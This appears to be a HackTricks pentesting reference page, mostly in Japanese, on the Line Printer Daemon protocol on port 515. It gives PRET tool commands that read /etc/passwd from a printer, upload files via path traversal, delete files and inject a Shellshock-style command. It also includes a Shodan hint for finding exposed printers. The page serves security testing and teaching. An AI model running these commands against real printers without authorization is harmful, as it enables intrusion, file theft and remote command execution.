515 - Pentesting Line Printer Daemon (LPD)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

LPDプロトコルの紹介

1980年代に、Line Printer Daemon (LPD)プロトコルがバークレーUnixで開発され、後にRFC1179を通じて正式化されました。このプロトコルはポート515/tcpで動作し、lprコマンドを通じての相互作用を可能にします。LPDを介した印刷の本質は、制御ファイル(ジョブの詳細とユーザーを指定するため)とデータファイル(印刷情報を保持する)を送信することにあります。制御ファイルはデータファイルのためのさまざまなファイル形式の選択を可能にしますが、これらのファイルの取り扱いは特定のLPD実装によって決まります。Unix系システムで広く認識されている実装はLPRngです。特に、LPDプロトコルは悪意のあるPostScriptPJL印刷ジョブを実行するために悪用される可能性があります。

LPDプリンターとの相互作用のためのツール

PRETは、lpdprintlpdtestという2つの重要なツールを紹介し、LPD互換プリンターとの相互作用のための簡単な方法を提供します。これらのツールは、データの印刷からプリンター上のファイルの操作(ダウンロード、アップロード、削除など)まで、さまざまなアクションを可能にします。

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

プリンターハッキングに興味がある方は、こちらに包括的なリソースがあります: Hacking Printers

Shodan

  • port 515

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

Last updated